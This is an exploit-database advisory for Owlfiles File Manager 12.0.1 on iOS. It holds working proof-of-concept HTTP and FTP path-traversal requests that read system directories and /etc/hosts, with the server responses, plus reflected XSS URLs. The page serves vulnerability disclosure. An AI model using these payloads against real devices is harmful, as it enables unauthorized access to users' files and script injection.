Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities

vendor:

Owlfiles File Manager

by:

Chokri Hammedi

7.5

CVSS

HIGH

Path Traversal, Local File Inclusion (LFI)

22, 98

CWE

Product Name: Owlfiles File Manager

Affected Version From: 12.0.1

Affected Version To: 12.0.1

Patch Exists: NO

Related CWE:

CPE: a:owlfiles_file_manager:12.0.1

Metasploit:

Other Scripts:

Platforms Tested: iPhone iOS 16.0

2022

Owlfiles File Manager 12.0.1 – Multiple Vulnerabilities

The Owlfiles File Manager 12.0.1 is vulnerable to path traversal and local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to access sensitive files and directories on the server.

Mitigation:

The vendor has not provided a patch or mitigation for these vulnerabilities. It is recommended to avoid using the Owlfiles File Manager 12.0.1 or to apply additional security measures to protect sensitive files and directories on the server.

Source

Exploit-DB raw data:

# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0



###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="Cryptexes/">Cryptexes/</a></li>
<li><a href="DriverKit/">DriverKit/</a></li>
<li><a href="Library/">Library/</a></li>
<li><a href="Applications/">Applications/</a></li>
<li><a href="Developer/">Developer/</a></li>
</ul>
</body></html>


#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1             localhost



###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x     0 root wheel        256 Jan 01 1970 usr
drwxr-xr-x     0 root wheel        128 Jan 01 1970 bin
drwxr-xr-x     0 root wheel        608 Jan 01 1970 sbin
drwxr-xr-x     0 root wheel        224 Jan 01 1970 System
drwxr-xr-x     0 root wheel        640 Jan 01 1970 Library
drwxr-xr-x     0 root wheel        224 Jan 01 1970 private
drwxr-xr-x     0 root wheel       1131 Jan 01 1970 dev
drwxr-xr-x     0 root admin       4512 Jan 01 1970 Applications
drwxr-xr-x     0 root admin         64 Jan 01 1970 Developer
drwxr-xr-x     0 root admin         64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1:

http://localhost:8080/download?path=<script>alert(1)</script>

poc 2:

http://localhost:8080/list?path=<script>alert(1)</script>